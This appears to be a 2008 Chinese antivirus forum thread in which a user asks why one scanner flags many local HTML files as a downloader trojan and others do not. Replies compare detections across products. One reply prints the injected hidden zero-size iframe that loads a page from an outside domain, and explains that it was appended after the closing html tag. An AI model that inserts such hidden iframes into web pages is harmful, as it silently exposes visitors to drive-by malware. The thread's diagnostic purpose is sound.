查看: 4523|回复: 15
收起左侧

一个微点不报而卡巴查出的木马——Trojan-Downloader.HTML.IFrame.ay

[复制链接]
岚星
发表于 2008-1-2 15:02:16 | 显示全部楼层 |阅读模式
比较奇怪的问题……

我用卡巴查出机器上N多HTML文档都中了Trojan-Downloader.HTML.IFrame.ay病毒。但微点没有报过。

微点是最新版,卡巴也是(紫狐绿色版,平时不开,定期全扫,以前没有报过这个病毒)。XP+SP2,机器没有出现任何中招情况。此病毒名称在网上没有查到,但卡巴报木马而非恶意脚本。卡巴清除失败。文件打开时正常——卡巴(无监控)、微点都不报。

不清楚是微点的漏杀还是卡巴的误报……有兴趣的请帮忙试试看。谢谢~



[ 本帖最后由 岚星 于 2008-1-2 15:04 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
xiaohf
发表于 2008-1-2 15:24:19 | 显示全部楼层
小红伞没报
可能是误报
rainchen0399
发表于 2008-1-2 15:38:55 | 显示全部楼层
NOD32报病毒  WIN32\fujacks病毒
忧郁浪子
发表于 2008-1-2 15:39:29 | 显示全部楼层
  1. <iframe src=http://wm.168080.com/wm/wm.htm width=0 height=0></iframe>
复制代码
是因为以上代码报的 代码本身对计算机没有危害动作 自然不会报
只是上边那个页面不知道会不会有木马 正常的写作规范是不会在</html>结束后再加上iframe框架的

[ 本帖最后由 忧郁浪子 于 2008-1-2 15:40 编辑 ]
忧郁浪子
发表于 2008-1-2 15:42:40 | 显示全部楼层
晕了 编辑帖子怎么都编辑不上

补充一下: 我这里打不开代码里的那个页面 这样就是对计算机无害了
岚星
 楼主| 发表于 2008-1-2 17:48:37 | 显示全部楼层
原来是这样……也不知道什么时候弄上去的,ms我电脑里那些HTML文档全中了这个……

不过仅仅这段代码,KAV清除起来应该很方便啊……怎么会显示无法清除病毒,只能选删除或跳过呢……
Nblock
发表于 2008-1-2 19:34:35 | 显示全部楼层
程序没有产生病毒行为  微点是无法进行行为判断的  楼主的系统之前遭遇过病毒~  
请实时开启微点 打好操作系统补丁+应用软件漏洞补丁   用下面这个工具全盘清除下

[ 本帖最后由 Nblock 于 2008-1-2 19:36 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
maliao198
发表于 2008-1-2 19:46:34 | 显示全部楼层
不止微点不报···驱逐舰也不报
Graybird
发表于 2008-1-2 19:50:14 | 显示全部楼层
The file '########.htm' has been determined to be 'MALWARE'. Our analysts named the threat HTML/Infected.WebPage.Gen. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.This malware is detected by a special detection routine from the engine module.
qigang
发表于 2008-1-2 19:59:33 | 显示全部楼层

1/1

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.DL.HTML.Ieframe.b

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.25.22
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-23 21:08 , Processed in 0.139631 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表